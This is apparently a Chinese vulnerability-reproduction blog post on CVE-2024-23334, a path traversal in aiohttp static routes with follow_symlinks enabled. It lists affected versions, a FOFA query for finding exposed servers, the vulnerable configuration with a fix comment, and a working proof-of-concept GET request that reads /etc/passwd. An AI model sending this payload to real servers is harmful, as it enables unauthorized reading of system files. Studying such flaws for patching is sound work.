【CVE-2024-23334 aiohttp static follow_symlinks未授权任意文件读取漏洞】【漏洞复现】【漏洞poc】

介绍

aiohttp是一个Python的HTTP客户端/服务器框架,它基于asyncio库实现异步编程模型,可以支持高性能和高并发的HTTP通信。aiohttp用于编写异步的Web服务器、Web应用程序或HTTP客户端,以提供对Web和HTTP资源的访问和操作。

存在漏洞版本

>= 1.0.5, < 3.9.2

fofa全球资产 百万级

易受攻击
利用难度:容易

fofa: app="aiohttp"

在这里插入图片描述

导致漏洞的原因

aiohttp使用选项"follow_symlinks"来决定是否跟踪静态根目录之外的符号链接。当"follow_symlinks "设置为 "True "时,将不会验证读取的文件是否在根目录内从而导致目录遍历,攻击者可以利用此漏洞访问系统上的任意文件。

app.router.add_routes([
    web.static("/static", "static/", follow_symlinks=True),  # Remove follow_symlinks to avoid the vulnerability
])

**

poc

**

#GET
​https://目标IP/static/../../../../../../etc/passwd

在这里插入图片描述

Logo

腾讯云面向开发者汇聚海量精品云计算使用和开发经验,营造开放的云计算技术生态圈。

更多推荐